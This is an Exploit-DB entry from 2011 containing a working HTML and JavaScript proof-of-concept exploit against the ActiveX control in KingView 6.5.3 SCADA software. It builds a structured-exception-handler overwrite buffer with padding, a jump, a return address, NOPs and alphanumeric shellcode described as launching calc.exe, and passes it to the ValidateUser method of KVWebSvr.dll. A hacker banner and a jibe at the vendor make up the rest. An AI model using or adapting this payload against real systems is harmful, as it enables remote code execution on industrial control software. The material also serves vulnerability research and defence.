KingView 6.5.3 SCADA - ActiveX

EDB-ID:

16936




Platform:

Windows

Date:

2011-03-07


# Exploit Title: KingView 6.5.3 SCADA ActiveX
# Date: March 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
# Version: 6.53 (English)
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8

Thanks to Dillon Beresford for Heap Exploit
<html>
mail----> shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
 / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
    
 COLOMBIA hacking presents.............
Beijing WellinControl Technology Development Co.,Ltd FIX your KVWebSvr.dll
 
<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target' /></object>
<script language='javascript'>
nse="\xEB\x06\x90\x90";
seh="\x4E\x20\xD1\x72";
nops="\x90";
while (nops.length<10){ nops+="\x90";}
/*Calc.exe alpha_upper badchars --> "\x8b\x93\x83\x8a\x8c\x8d\x8f\x8e\x87\x81\x84\x86\x88\x89\x90\x91\x92\x94\x95\x96\x97\x98\x99\x82\x85\x9f\x9a\x9e\x9d\x9b\x9f\x76*/
shell="\x54\x5f\xda\xdf\xd9\x77\xf4\x5e\x56\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4c\x4b\x5a\x4c\x50\x55\x4c\x4b\x5a\x4c\x43\x58\x51\x30\x51\x30\x51\x30\x56\x4f\x52\x48\x52\x43\x45\x31\x52\x4c\x43\x53\x4c\x4d\x51\x55\x5a\x58\x56\x30\x58\x38\x49\x57\x4d\x43\x49\x52\x54\x37\x4b\x4f\x58\x50\x41\x41";
junk1="A";
junk2="A";
while (junk1.length<624){ junk1+=junk1;}
junk1=junk1.substring(0,624);
junk2=junk1;
while (junk2.length<8073){ junk2+=junk2;}
arg2=junk1+nse+seh+nops+shell+junk2;
arg1="Anything";
target.ValidateUser(arg1 ,arg2);
 
 
</script>